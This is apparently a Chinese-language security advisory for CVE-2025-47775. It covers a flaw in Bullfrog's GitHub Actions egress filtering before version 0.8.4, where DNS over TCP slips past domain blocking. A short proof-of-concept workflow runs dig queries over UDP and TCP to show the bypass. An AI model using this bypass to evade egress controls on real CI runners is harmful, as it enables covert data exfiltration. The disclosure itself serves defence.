Bullfrog的DNS over TCP绕过域名过滤 · CVE-2025-47775
漏洞详情
包名称: actions
受影响版本: < 0.8.4
已修复版本: 0.8.4
漏洞描述
摘要
使用TCP协议会破坏阻断机制,允许DNS数据外泄。
概念验证(PoC)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
name: test
on:
push:
branches:
- "*"
jobs:
testBullFrog:
runs-on: ubuntu-22.04
steps:
- name: Use google dns
run: |
sudo resolvectl dns eth0 1.1.1.1
resolvectl status
- name: Set up bullfrog to block everything
uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
with:
egress-policy: block
allowed-domains: |
*.github.com
- name: Test connectivity
run: |
echo testing udp allowed ..
dig api.github.com @1.1.1.1 || :
echo testing tcp allowed ..
dig api.github.com @1.1.1.1 +tcp || :
echo testing udp not allowed
dig api.google.com @1.1.1.1 || :
echo testing tcp not allowed
dig api.google.com @1.1.1.1 +tcp || :
|
影响
沙箱绕过
参考信息
安全评分
严重程度: 中等
CVSS总体评分: 6.2/10
CVSS v3基础指标
- 攻击向量: 本地
- 攻击复杂度: 低
- 所需权限: 无
- 用户交互: 无
- 范围: 未改变
- 机密性: 高
- 完整性: 无
- 可用性: 无
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
弱点分类
弱点: CWE-201
描述: 在发送的数据中插入敏感信息 - 代码将数据传输给另一个参与者,但部分数据包含了该参与者不应访问的敏感信息。